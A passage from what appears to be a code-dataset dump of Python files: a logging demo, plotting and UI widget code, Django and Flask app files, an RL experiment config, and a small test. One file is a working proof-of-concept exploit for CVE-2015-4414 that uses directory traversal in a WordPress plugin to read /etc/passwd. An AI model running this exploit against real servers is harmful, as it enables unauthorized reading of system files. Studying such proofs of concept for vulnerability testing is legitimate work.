] | null | null | null | examples/demo0.py | gergelyk/python-indentedlogs | 4f44ba9d67e5a8def6d8c67675f4a2ccac50fd97 | [
"MIT"
] | null | null | null | examples/demo0.py | gergelyk/python-indentedlogs | 4f44ba9d67e5a8def6d8c67675f4a2ccac50fd97 | [
"MIT"
] | null | null | null | import logging
# Log line format: timestamp, level, file:line, logger name, message
# ('{'-style fields, see the style='{' argument below).
fmt = '{asctime} {levelname:<8} {filename:>3}:{lineno:<3} {name:>10} {message}'
datefmt = '%Y-%m-%d %H:%M:%S'
# Configure the root logger once for the whole demo script.
logging.basicConfig(level='DEBUG', format=fmt, datefmt=datefmt, style='{')
log = logging.getLogger()  # root logger shared by every step below
def bump_version():
pass
def configure():
log.debug(f"Collecting parameters")
log.debug(f"Ask for confirmation")
log.info(f"Save configuration")
def select_target():
log.warning(f"Default target selected")
def prepare():
log.debug(f"Bump version")
bump_version()
log.debug(f"Generate configuration")
configure()
log.debug(f"Select target")
select_target()
def call_compiler():
log.debug(f"Preprocess sources")
log.info(f"Compile sources")
def call_linker():
log.info(f"Link objects")
def build_executable():
# Note that callables that don't invoke logging
# don't create additional indentation
call_compiler()
call_linker()
def build_package():
log.warning(f"Symbols will be removed")
log.debug(f"Strip binary")
log.debug(f"Add meta data")
log.debug(f"Create archive")
def upload_package():
pass
def release_app():
log.debug(f"Prepare")
prepare()
log.info(f"Build executable")
build_executable()
log.info(f"Build package")
build_package()
log.info(f"Upload package")
upload_package()
release_app()
| 19.571429 | 79 | 0.670803 |
aa0e46854cbe3f24783514643a1adffb2c97541c | 2,660 | py | Python | src/plot_kernels_appendix.py | jhgoebbert/BSTIM-Covid19 | b927b1ab60ff915b988ff32b78189a0e61cceb45 | [
"MIT"
] | null | null | null | src/plot_kernels_appendix.py | jhgoebbert/BSTIM-Covid19 | b927b1ab60ff915b988ff32b78189a0e61cceb45 | [
"MIT"
] | null | null | null | src/plot_kernels_appendix.py | jhgoebbert/BSTIM-Covid19 | b927b1ab60ff915b988ff32b78189a0e61cceb45 | [
"MIT"
] | null | null | null |
# Figure script: visualizes the spatio-temporal interaction-effect basis as a
# 5x5 grid — marginal temporal B-spline bases across the top row, marginal
# spatial Gaussian bases down the left column, and their outer products
# (the 16 combined kernels) filling the interior.
from ModelInstance import ModelInstance
from matplotlib import rc
import matplotlib
import numpy as np
import pickle as pkl
from sampling_utils import *
from shared_utils import load_data, split_data
import datetime
from matplotlib import pyplot as plt
plt.style.use('ggplot')
matplotlib.rcParams['text.usetex'] = True
# NOTE(review): 'text.latex.unicode' was removed in matplotlib 3.0 — this line
# raises KeyError on modern matplotlib; confirm the pinned version.
matplotlib.rcParams['text.latex.unicode'] = True
plt.rcParams["font.family"] = "Bitstream Charter"
# NOTE(review): diseases / prediction_regions appear unused in this script.
diseases = ["campylobacter", "rotavirus", "boreliosis"]
prediction_regions = ["germany", "bavaria"]
# Evaluation grids: spatial distances in km, temporal distances in seconds
# (0 to 5 weeks).
locs = np.linspace(-100, 100, 200)
ts = np.linspace(0 * 7 * 24 * 3600, 5 * 7 * 24 * 3600, 200)
# Symbolic inputs for the basis functions (tt/theano and the *_bf helpers
# presumably come from sampling_utils' star import — confirm).
dt = tt.fvector("dt")
dx = tt.fvector("dx")
# Degree-2 B-spline temporal basis on weekly knots; Gaussian spatial basis at
# four bandwidths (km).
temporal_bfs = tt.stack(bspline_bfs(dt, np.array(
    [0, 0, 1, 2, 3, 4, 5]) * 7 * 24 * 3600.0, 2), axis=0)
spatial_bfs = tt.stack([gaussian_bf(dx, σ)
                        for σ in [6.25, 12.5, 25.0, 50.0]], axis=0)
# Compile the symbolic bases and evaluate them on the numeric grids,
# rebinding the names to plain arrays.
temporal_bfs = theano.function(
    [dt], temporal_bfs, allow_input_downcast=True)(ts)
spatial_bfs = theano.function(
    [dx], spatial_bfs, allow_input_downcast=True)(locs)
fig = plt.figure(figsize=(12, 12))
grid = plt.GridSpec(len(spatial_bfs) + 1, len(temporal_bfs) + 1, top=0.92,
                    bottom=0.07, left=0.09, right=0.93, hspace=0.2, wspace=0.2)
# ax0 spans the whole grid and only provides the shared axis labels; ax00 is
# the (hidden) top-left cell used as the share anchor for the other axes.
ax0 = fig.add_subplot(grid[:, :])
ax00 = fig.add_subplot(grid[0, 0])
#ax00.pcolormesh(_t, x, Kc.T)
# ax00.set_xticks(tticks)
# ax00.set_xticklabels(tticks_l)
# ax00.xaxis.tick_top()
ax00.set_visible(False)
# ax00.set_xlim(-1,30)
# Top row: the four temporal basis functions (x-axis in days).
for k in range(4):
    ax = fig.add_subplot(grid[0, 1 + k], sharex=ax00)
    ax.plot(ts / (24 * 3600), temporal_bfs[k, :])
    ax.set_ylim(0, 1)
    ax.xaxis.tick_top()
    ax.tick_params(labelsize=18, length=6, labelleft=k == 0)
# Left column: the four spatial basis functions, plotted sideways with a
# reversed x-axis so they read toward the interior panels.
for k in range(4):
    ax = fig.add_subplot(grid[1 + k, 0], sharey=ax00)
    ax.plot(spatial_bfs[k, :], locs)
    ax.set_xlim(0.1, 0)
    ax.xaxis.tick_bottom()
    ax.tick_params(labelsize=18, length=6, labelbottom=k == 3)
# Interior 4x4: outer product of spatial basis i and temporal basis j.
for i in range(4):
    for j in range(4):
        ax = fig.add_subplot(grid[1 + i, 1 + j], sharex=ax00, sharey=ax00)
        K = spatial_bfs[i, :].reshape(
            (-1, 1)) * temporal_bfs[j, :].reshape((1, -1))
        ax.contourf(ts / (24 * 3600), locs, K)
        ax.set_rasterized(True)
        ax.tick_params(labelbottom=False, labelleft=False,
                       labelsize=18, length=6)
ax0.set_xlabel("temporal distance [days]", fontsize=22)
ax0.set_ylabel("spatial distance [km]", fontsize=22)
ax0.set_frame_on(False)
ax0.set_xticks([])
ax0.set_yticks([])
ax0.yaxis.set_label_position("right")
#fig.suptitle("Interaction Effect Basis", fontsize=18)
# fig.savefig("../figures/kernels_appendix.pdf")
plt.show()
| 32.439024 | 79 | 0.662782 |
7186854eccd12766509d49fa4d71cc0c16528ffa | 192 | py | Python | ex003.py | almmessias/CursoPython | 4cec6946f32002cbd5d3b802df11ea1ba74169f5 | [
"MIT"
] | null | null | null | ex003.py | almmessias/CursoPython | 4cec6946f32002cbd5d3b802df11ea1ba74169f5 | [
"MIT"
] | null | null | null | ex003.py | almmessias/CursoPython | 4cec6946f32002cbd5d3b802df11ea1ba74169f5 | [
"MIT"
] | null | null | null | valor1 = int (input ('Digite o primeiro valor: '))
valor2 = int (input ('Digite o segundo valor: '))
soma = valor1 + valor2
print ('A soma entre {} e {} vale {}'.format(valor1, valor2, soma)) | 38.4 | 67 | 0.651042 |
681450bd0014566fad289ba57936a4eec48fbc30 | 7,869 | py | Python | pyxel/ui/widget.py | sacredhotdog/pyxel | 08da48dbd1ac53c06cf8a383f28d66fd89f78f4a | [
"MIT"
] | null | null | null | pyxel/ui/widget.py | sacredhotdog/pyxel | 08da48dbd1ac53c06cf8a383f28d66fd89f78f4a | [
"MIT"
] | null | null | null | pyxel/ui/widget.py | sacredhotdog/pyxel | 08da48dbd1ac53c06cf8a383f28d66fd89f78f4a | [
"MIT"
] | null | null | null | import pyxel
from .constants import (
WIDGET_CLICK_DIST,
WIDGET_CLICK_TIME,
WIDGET_HOLD_TIME,
WIDGET_PANEL_COLOR,
WIDGET_REPEAT_TIME,
WIDGET_SHADOW_COLOR,
)
class Widget:
    """
    Base class for pyxel UI widgets.  A widget owns its position/size, a
    parent/child tree, visibility and enabled flags, per-event handler lists,
    and (class-wide) the mouse-capture state used to route press/drag/click
    events to the widget that received the initial button press.

    Events:
        __on_show()
        __on_hide()
        __on_enabled()
        __on_disabled()
        __on_move(x, y)
        __on_resize(width, height)
        __on_mouse_down(key, x, y)
        __on_mouse_up(key, x, y)
        __on_mouse_drag(key, x, y, dx, dy)
        __on_mouse_repeat(key, x, y)
        __on_mouse_click(key, x, y)
        __on_mouse_hover(x, y)
        __on_update()
        __on_draw()
    """

    class CaptureInfo:
        # Snapshot of an active mouse capture: which widget took the press,
        # which button, the frame it happened on, and the press/last-seen
        # positions (used for drag deltas and click time/distance checks).
        widget = None
        key = None
        time = None
        press_pos = None
        last_pos = None

    # Class attribute: capture state is shared by all widget instances, so at
    # most one widget holds the mouse at any time.
    _capture_info = CaptureInfo()

    def __init__(
        self, parent, x, y, width, height, *, is_visible=True, is_enabled=True
    ):
        self._parent = None
        self._children = []
        self._x = None
        self._y = None
        self._width = None
        self._height = None
        self._is_visible = None
        self._is_enabled = None
        self._event_handler_lists = {}
        # Go through the properties/methods (not the backing fields) so the
        # parent's child list is updated and the initial events fire.
        self.parent = parent
        self.move(x, y)
        self.resize(width, height)
        self.is_visible = is_visible
        self.is_enabled = is_enabled

    @property
    def parent(self):
        return self._parent

    @parent.setter
    def parent(self, value):
        # Re-parenting: detach from the old parent's child list first, then
        # append to the new parent's (appended last => drawn/hit-tested last).
        if self._parent:
            self._parent._children.remove(self)
        self._parent = value
        if value:
            value._children.append(self)

    @property
    def x(self):
        return self._x

    @property
    def y(self):
        return self._y

    @property
    def width(self):
        return self._width

    @property
    def height(self):
        return self._height

    @property
    def is_visible(self):
        return self._is_visible

    @is_visible.setter
    def is_visible(self, value):
        # Fire show/hide only on an actual state change.
        if self._is_visible == value:
            return
        self._is_visible = value
        if value:
            self.call_event_handler("show")
        else:
            self.call_event_handler("hide")

    @property
    def is_enabled(self):
        return self._is_enabled

    @is_enabled.setter
    def is_enabled(self, value):
        # Fire enabled/disabled only on an actual state change.
        if self._is_enabled == value:
            return
        self._is_enabled = value
        if value:
            self.call_event_handler("enabled")
        else:
            self.call_event_handler("disabled")

    def _get_event_handler_list(self, event):
        # Lazily create the handler list for this event name.
        if event not in self._event_handler_lists:
            self._event_handler_lists[event] = []
        return self._event_handler_lists[event]

    def add_event_handler(self, event, handler):
        self._get_event_handler_list(event).append(handler)

    def remove_event_handler(self, event, handler):
        self._get_event_handler_list(event).remove(handler)

    def call_event_handler(self, event, *args):
        # Invoke every registered handler for `event` in registration order.
        for handler in self._get_event_handler_list(event):
            handler(*args)

    def is_hit(self, x, y):
        # Inclusive bounds test against this widget's rectangle.
        return (
            x >= self._x
            and x <= self._x + self._width - 1
            and y >= self._y
            and y <= self._y + self._height - 1
        )

    def move(self, x, y):
        if self._x == x and self._y == y:
            return
        # First call (from __init__): seed the position so the delta below is
        # zero and the "move" event still fires once.
        if self._x is None or self._y is None:
            self._x = x
            self._y = y
        dx = x - self._x
        dy = y - self._y
        self._move_delta(dx, dy)

    def _move_delta(self, dx, dy):
        # Shift this widget and recursively all descendants by the same delta,
        # firing "move" on each.
        self._x += dx
        self._y += dy
        self.call_event_handler("move", self._x, self._y)
        for child in self._children:
            child._move_delta(dx, dy)

    def resize(self, width, height):
        # Fires "resize" only on an actual change; children are not resized.
        if self._width == width and self._height == height:
            return
        self._width = width
        self._height = height
        self.call_event_handler("resize", width, height)

    def draw_panel(self, x, y, width, height, *, with_shadow=True):
        """Draw a filled panel; top/bottom edges are inset one pixel for
        rounded corners, with an optional drop shadow on the right/bottom."""
        x1 = x
        y1 = y
        x2 = x + width - 1
        y2 = y + height - 1
        pyxel.line(x1 + 1, y1, x2 - 1, y1, WIDGET_PANEL_COLOR)
        pyxel.rect(x1, y1 + 1, x2, y2 - 1, WIDGET_PANEL_COLOR)
        pyxel.line(x1 + 1, y2, x2 - 1, y2, WIDGET_PANEL_COLOR)
        if with_shadow:
            pyxel.line(x1 + 2, y2 + 1, x2, y2 + 1, WIDGET_SHADOW_COLOR)
            pyxel.line(x2 + 1, y1 + 2, x2 + 1, y2, WIDGET_SHADOW_COLOR)
            pyxel.pix(x2, y2, WIDGET_SHADOW_COLOR)

    def _capture_mouse(self, key):
        # Record this widget as the capture target for `key`, remembering the
        # press frame and position for later click detection.
        Widget._capture_info.widget = self
        Widget._capture_info.key = key
        Widget._capture_info.time = pyxel.frame_count
        Widget._capture_info.press_pos = (pyxel.mouse_x, pyxel.mouse_y)
        Widget._capture_info.last_pos = Widget._capture_info.press_pos

    def _release_mouse(self):
        Widget._capture_info.widget = None
        Widget._capture_info.key = None
        Widget._capture_info.time = None
        Widget._capture_info.press_pos = None
        Widget._capture_info.last_pos = None

    def update_widgets(self):
        """Per-frame entry point (call on the root widget): routes mouse input
        to the capturing widget if any, else hit-tests the tree, then runs the
        "update" traversal."""
        capture_widget = Widget._capture_info.widget
        if capture_widget:
            capture_widget._process_capture()
        else:
            self._process_input()
        self._update()

    def _process_capture(self):
        # Drive drag/hover/repeat/up/click events while this widget holds the
        # mouse capture.
        capture_info = Widget._capture_info
        last_mx, last_my = capture_info.last_pos
        mx = pyxel.mouse_x
        my = pyxel.mouse_y
        if mx != last_mx or my != last_my:
            self.call_event_handler(
                "mouse_drag", capture_info.key, mx, my, mx - last_mx, my - last_my
            )
            capture_info.last_pos = (mx, my)
        if self.is_hit(mx, my):
            self.call_event_handler("mouse_hover", mx, my)
        if pyxel.btnp(capture_info.key, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
            self.call_event_handler("mouse_repeat", capture_info.key, mx, my)
        if pyxel.btnr(capture_info.key):
            self.call_event_handler("mouse_up", capture_info.key, mx, my)
            # A release counts as a click only if it happened quickly enough
            # and close enough to the original press position.
            press_x, press_y = capture_info.press_pos
            if (
                pyxel.frame_count <= capture_info.time + WIDGET_CLICK_TIME
                and abs(pyxel.mouse_x - press_x) <= WIDGET_CLICK_DIST
                and abs(pyxel.mouse_y - press_y) <= WIDGET_CLICK_DIST
            ):
                self.call_event_handler("mouse_click", capture_info.key, mx, my)
            self._release_mouse()

    def _process_input(self):
        # Depth-first hit test; returns True when this widget (or a child)
        # consumed the input.  Children are visited in reverse order so the
        # most recently added (topmost) widget gets first chance.
        if not self._is_visible:
            return False
        if self._is_enabled:
            for widget in reversed(self._children):
                if widget._process_input():
                    return True
        else:
            return False
        mx = pyxel.mouse_x
        my = pyxel.mouse_y
        if self.is_hit(mx, my):
            key = None
            if pyxel.btnp(pyxel.KEY_LEFT_BUTTON):
                key = pyxel.KEY_LEFT_BUTTON
            elif pyxel.btnp(pyxel.KEY_RIGHT_BUTTON):
                key = pyxel.KEY_RIGHT_BUTTON
            elif pyxel.btnp(pyxel.KEY_MIDDLE_BUTTON):
                key = pyxel.KEY_MIDDLE_BUTTON
            if key is not None:
                # A fresh button press starts a capture before the event fires.
                self._capture_mouse(key)
                self.call_event_handler("mouse_down", key, mx, my)
            self.call_event_handler("mouse_hover", mx, my)
            return True
        return False

    def _update(self):
        # Pre-order "update" traversal; skips invisible subtrees entirely.
        if not self._is_visible:
            return
        self.call_event_handler("update")
        for child in self._children:
            child._update()

    def draw_widgets(self):
        # Pre-order "draw" traversal: parents draw first, children paint over.
        if not self._is_visible:
            return
        self.call_event_handler("draw")
        for child in self._children:
            child.draw_widgets()
| 26.40604 | 82 | 0.577837 |
7325df797eee7cf16507071f4e32000bdc795e7c | 1,835 | py | Python | 2015/CVE-2015-4414/poc/pocsploit/CVE-2015-4414.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 421 | 2021-12-07T08:46:40.000Z | 2022-03-31T12:42:16.000Z | 2015/CVE-2015-4414/poc/pocsploit/CVE-2015-4414.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 5 | 2022-03-27T07:37:32.000Z | 2022-03-31T13:56:11.000Z | 2015/CVE-2015-4414/poc/pocsploit/CVE-2015-4414.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 144 | 2021-12-07T11:06:14.000Z | 2022-03-31T07:41:35.000Z | import requests
# Vuln Base Info
def info():
    """Return the static vulnerability metadata for CVE-2015-4414
    (WordPress SE HTML5 Album Audio Player directory traversal)."""
    references = [
        "https://www.exploit-db.com/exploits/37274",
        "https://www.cvedetails.com/cve/CVE-2015-4414",
    ]
    # CVSS fields are intentionally left blank in this template.
    classification = {
        "cvss-metrics": "",
        "cvss-score": "",
        "cve-id": "",
        "cwe-id": "",
    }
    return {
        "author": "cckuailong",
        "name": '''WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal''',
        "description": '''Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.''',
        "severity": "high",
        "references": references,
        "classification": classification,
        "metadata": {"vuln-target": ""},
        "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"],
    }
# Vender Fingerprint
def fingerprint(url):
    """Vendor fingerprint check.

    This PoC performs no actual fingerprinting, so every target is treated
    as a potential match.
    """
    return True
# Proof of Concept
def poc(url):
    """Probe *url* for the directory-traversal flaw (CVE-2015-4414).

    Returns a dict that ALWAYS contains a boolean ``success`` key; on a
    confirmed hit it also carries ``info`` (vulnerability metadata) and
    ``payload`` (the full exploit URL).
    """
    # Default to failure so callers can always index result["success"]
    # (previously the key was missing when the target responded but was not
    # vulnerable).
    result = {"success": False}
    try:
        url = format_url(url)
        # Traverse out of the uploads directory to read /etc/passwd.
        path = '/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd'
        resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
        # A vulnerable target serves the file verbatim.
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path
    except Exception:
        # Network/parse failure: the target could not be confirmed.  Narrowed
        # from a bare `except:` so KeyboardInterrupt/SystemExit propagate.
        result["success"] = False
    return result
# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to poc() for this read-only traversal."""
    return poc(url)
# Utils
def format_url(url):
    """Normalize a target URL: trim surrounding whitespace, prepend
    ``http://`` when no scheme is given, and drop any trailing slash.

    (The original return line had dataset-export residue fused onto it,
    which made it a syntax error; reconstructed here.)
    """
    url = url.strip()
    if not (url.startswith('http://') or url.startswith('https://')):
        url = 'http://' + url
    url = url.rstrip('/')
    return url
e27e9489ff8753f3a60d4686d7f369a5249b39b4 | 668 | py | Python | manage.py | srivarkor/SampleAPI | 0cce27463dfd3669c0b92e923bf68ed4b0212de4 | [
"MIT"
] | null | null | null | manage.py | srivarkor/SampleAPI | 0cce27463dfd3669c0b92e923bf68ed4b0212de4 | [
"MIT"
] | null | null | null | manage.py | srivarkor/SampleAPI | 0cce27463dfd3669c0b92e923bf68ed4b0212de4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    # Point Django at this project's settings unless the caller already set it.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'UsersProject.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a friendlier hint; chaining preserves the original
        # traceback for debugging.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    # Dispatch to Django's CLI with the arguments we were invoked with.
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| 29.043478 | 76 | 0.681138 |
2cc9ce18c24704217fde3b579ff06dc5ad36fd87 | 1,644 | py | Python | deepdrive_zero/experiments/intersection_2_agents_fine_tune_test.py | shantanuwadnerkar/deepdrive-zero | 3134a5b092a53ff60e4207d7419fd6a19cb5a6e9 | [
"MIT"
] | null | null | null | deepdrive_zero/experiments/intersection_2_agents_fine_tune_test.py | shantanuwadnerkar/deepdrive-zero | 3134a5b092a53ff60e4207d7419fd6a19cb5a6e9 | [
"MIT"
] | null | null | null | deepdrive_zero/experiments/intersection_2_agents_fine_tune_test.py | shantanuwadnerkar/deepdrive-zero | 3134a5b092a53ff60e4207d7419fd6a19cb5a6e9 | [
"MIT"
] | null | null | null | import os
import sys
from deepdrive_zero.experiments import utils
from spinup.utils.run_utils import ExperimentGrid
from spinup import ppo_pytorch
import torch
# Experiment name is derived from this file's name (without ".py").
experiment_name = os.path.basename(__file__)[:-3]
notes = """Adding yield to left input and reward"""
# Environment configuration for the two-agent intersection fine-tuning run.
env_config = dict(
    env_name='deepdrive-2d-intersection-w-gs-allow-decel-v0',
    is_intersection_map=True,
    expect_normalized_action_deltas=False,
    # NOTE(review): 60*100 presumably scales the jerk penalty per physics
    # step — confirm against the env's step frequency.
    jerk_penalty_coeff=0.20 / (60*100),
    gforce_penalty_coeff=0.06,
    collision_penalty_coeff=4,
    end_on_harmful_gs=False,
    incent_win=True,
    constrain_controls=False,
    incent_yield_to_oncoming_traffic=False,
)
# Policy/value network: two 256-unit tanh hidden layers.
net_config = dict(
    hidden_units=(256, 256),
    activation=torch.nn.Tanh
)
eg = ExperimentGrid(name=experiment_name)
eg.add('env_name', env_config['env_name'], '', False)
# eg.add('seed', 0)
# NOTE(review): machine-specific checkpoint path — this run resumes from a
# previous fine-tune and will fail on other hosts.
eg.add('resume', '/home/c2/src/tmp/spinningup/data/intersection_2_agents_fine_tune_collision_resume_add_comfort5/intersection_2_agents_fine_tune_collision_resume_add_comfort5_s0_2020_03-15_16-14.51')
eg.add('reinitialize_optimizer_on_resume', True)
eg.add('num_inputs_to_add', 0)
# Small learning rates for fine-tuning an already-trained policy.
eg.add('pi_lr', 3e-6)
eg.add('vf_lr', 1e-5)
# eg.add('boost_explore', 10)
eg.add('epochs', 8000)
eg.add('steps_per_epoch', 16000)
eg.add('ac_kwargs:hidden_sizes', net_config['hidden_units'], 'hid')
eg.add('ac_kwargs:activation', net_config['activation'], '')
eg.add('notes', notes, '')
eg.add('run_filename', os.path.realpath(__file__), '')
eg.add('env_config', env_config, '')
def train():
    # Launch PPO over the configured experiment grid.
    eg.run(ppo_pytorch)
if __name__ == '__main__':
utils.run(train_fn=train, env_config=env_config, net_config=net_config) | 31.615385 | 199 | 0.754866 |
266f6ed6d3e092c83d3c7800e37ff9b501807265 | 434 | py | Python | Codewars/8kyu/compare-within-margin/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/8kyu/compare-within-margin/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/8kyu/compare-within-margin/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
# Without a margin, close_compare reduces to a plain sign comparison:
# -1 below, 0 equal, 1 above.
test.it('No margin')
test.assert_equals(close_compare(4, 5), -1)
test.assert_equals(close_compare(5, 5), 0)
test.assert_equals(close_compare(6, 5), 1)
# With margin=3, any value within +/-3 of the reference counts as equal;
# values just outside the band compare as above/below.
test.it('With margin of 3')
test.assert_equals(close_compare(2, 5, 3), 0)
test.assert_equals(close_compare(5, 5, 3), 0)
test.assert_equals(close_compare(8, 5, 3), 0)
test.assert_equals(close_compare(8.1, 5, 3), 1)
test.assert_equals(close_compare(1.99, 5, 3), -1)
| 31 | 49 | 0.723502 |
874dad16c579924936a2e45f638241115bc94fca | 2,320 | py | Python | tatudashboard/exceptions.py | pinodeca/tatu-dashboard | 1685f7c862c2d3502abd51d9ff4f2a12b147680c | [
"Apache-2.0"
] | null | null | null | tatudashboard/exceptions.py | pinodeca/tatu-dashboard | 1685f7c862c2d3502abd51d9ff4f2a12b147680c | [
"Apache-2.0"
] | null | null | null | tatudashboard/exceptions.py | pinodeca/tatu-dashboard | 1685f7c862c2d3502abd51d9ff4f2a12b147680c | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2014 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard import exceptions
class Base(Exception):
    """Root of the dashboard client's exception hierarchy.

    When constructed without a message, the exception text defaults to the
    concrete class name so bare raises remain identifiable.
    """

    def __init__(self, message=None):
        super(Base, self).__init__(message or self.__class__.__name__)


class UnsupportedVersion(Base):
    """Raised for an API version the client does not support."""


class ResourceNotFound(Base):
    """Raised when a requested resource cannot be located."""


class NoUniqueMatch(Base):
    """Raised when a lookup matches more than one resource."""


class RemoteError(Base):
    """An error reported by the remote service.

    Carries the service payload verbatim in ``code``, ``type``, ``errors``
    and ``request_id``.  ``message`` holds the best human-readable text that
    could be derived from the payload (possibly ``None``).
    """

    def __init__(self, message=None, code=None, type=None, errors=None,
                 request_id=None, **ignore):
        self.code = code
        self.type = type
        self.errors = errors
        self.request_id = request_id
        self.message = self._get_error_message(message, type, errors)
        super(RemoteError, self).__init__(self.message)

    def _get_error_message(self, _message, _type, _errors):
        # Prefer the explicit message; otherwise synthesize one from the
        # structured error list, and finally fall back to the error type.
        if _message:
            return _message
        if _errors and 'errors' in _errors:
            return '. '.join(err['message'] for err in _errors['errors']
                             if 'message' in err)
        if _type:
            return str(_type)
        return _message
class Unknown(RemoteError):
    """Remote failure that did not map to a more specific class."""
    pass
class BadRequest(RemoteError):
    """The service rejected the request as malformed or invalid."""
    pass
class Forbidden(RemoteError):
    """The caller is not authorized to perform the operation."""
    pass
class Conflict(RemoteError):
    """The request conflicts with the current resource state."""
    pass
class NotFound(RemoteError):
    """The service reported the target resource does not exist."""
    pass
class OverQuota(RemoteError):
    """The operation would exceed the tenant's quota."""
    pass
# Extend Horizon's standard exception categories with this client's classes so
# the dashboard's generic error handling treats them consistently.
NOT_FOUND = exceptions.NOT_FOUND + (
    ResourceNotFound,
    NotFound,
)
RECOVERABLE = exceptions.RECOVERABLE + (
    BadRequest,
    Conflict,
)
UNAUTHORIZED = exceptions.UNAUTHORIZED + (
    Forbidden,
)
| 23.673469 | 71 | 0.655172 |
c64d1070668087f8944cac487dc8e8cdf9fecabb | 236 | py | Python | tests/test_observables.py | mschneider/mango-explorer | ed50880ef80b31b679c9c89fa9bf0579391d71c9 | [
"MIT"
] | 1 | 2021-09-09T20:49:46.000Z | 2021-09-09T20:49:46.000Z | tests/test_observables.py | mschneider/mango-explorer | ed50880ef80b31b679c9c89fa9bf0579391d71c9 | [
"MIT"
] | null | null | null | tests/test_observables.py | mschneider/mango-explorer | ed50880ef80b31b679c9c89fa9bf0579391d71c9 | [
"MIT"
] | 2 | 2021-09-09T20:49:50.000Z | 2021-11-05T21:41:41.000Z | from .context import mango
import rx
def test_collecting_observer_subscriber():
items = ["a", "b", "c"]
actual = mango.CollectingObserverSubscriber()
rx.from_(items).subscribe(actual)
assert actual.collected == items
| 21.454545 | 49 | 0.711864 |
78f999daaed6f06f0a08a7b249caa79cd8f07ccb | 2,997 | py | Python | application/main/main_views.py | alchekroun/eloart | 2564ba2d25b584fcae4344cac55c048b0b6f2548 | [
"Unlicense"
] | null | null | null | application/main/main_views.py | alchekroun/eloart | 2564ba2d25b584fcae4344cac55c048b0b6f2548 | [
"Unlicense"
] | null | null | null | application/main/main_views.py | alchekroun/eloart | 2564ba2d25b584fcae4344cac55c048b0b6f2548 | [
"Unlicense"
] | null | null | null | import requests
from ..helpElo import newelo
from flask import Blueprint, render_template, redirect, url_for
from sqlalchemy.sql.expression import func
from application import db
from application.models import Piece
main_bp = Blueprint('main_bp', __name__, template_folder='templates', static_folder='static')
@main_bp.route('/')
def index():
f1 = Piece.query.order_by(func.rand()).limit(1).first()
f2 = Piece.query.filter(Piece.nom != f1.nom).order_by(func.rand()).limit(1).first()
return render_template('index.html', f1=f1, f2=f2)
@main_bp.route('/ranks/')
def ranks():
allrank = Piece.query.order_by(Piece.elo.desc())
return render_template('ranks.html', allrank=allrank)
@main_bp.route('/about/')
def about():
return render_template('about.html')
@main_bp.route('/score/<idPiece1>/<idPiece2>/')
def score(idPiece1, idPiece2):
winner = Piece.query.get(idPiece1)
loser = Piece.query.get(idPiece2)
winner.elo = newelo(winner.elo, loser.elo, 1)
loser.elo = newelo(loser.elo, winner.elo, 0)
db.session.commit()
return redirect(url_for('main_bp.index'))
@main_bp.route('/piece/<idPiece>')
def showpiece(idPiece):
piece = Piece.query.get(idPiece)
if piece:
return render_template('oeuvre.html', piece=piece)
return render_template('error.html')
@main_bp.route('/init_db/')
def init_db():
    """Seed the database with a single piece fetched from the Met Museum API.

    Redirects to the home page on success, or to the error page when the
    API request fails.  (A bulk variant that searched department 11 for
    highlighted French works and inserted every hit used to live here as
    dead code; reintroduce it by iterating the ``objectIDs`` of the search
    endpoint and applying the same field mapping below.)
    """
    try:
        response = requests.get(
            "https://collectionapi.metmuseum.org/public/collection/v1/objects/438822",
            timeout=10)
        response.raise_for_status()
        piece_json = response.json()
    except requests.RequestException:
        # Network failure or non-2xx status: bail out to the error page
        # instead of surfacing a 500.
        return redirect(url_for('main_bp.error'))
    # Map the Met API payload onto our Piece model; the API's objectID is
    # reused as our primary key.  (Renamed locals to stop shadowing the
    # built-in `id`.)
    piece = Piece(
        id=piece_json["objectID"],
        nom=piece_json["title"],
        linkImage=piece_json["primaryImage"],
        autheur=piece_json["artistDisplayName"],
        date=piece_json["objectDate"],
        wikiAutheur=piece_json["artistWikidata_URL"],
    )
    db.session.add(piece)
    db.session.commit()
    return redirect(url_for('main_bp.index'))
@main_bp.route('/error/')
def error():
    """Render the generic error page."""
    return render_template('error.html')
| 31.882979 | 114 | 0.682349 |
Subsets and Splits
No community queries yet
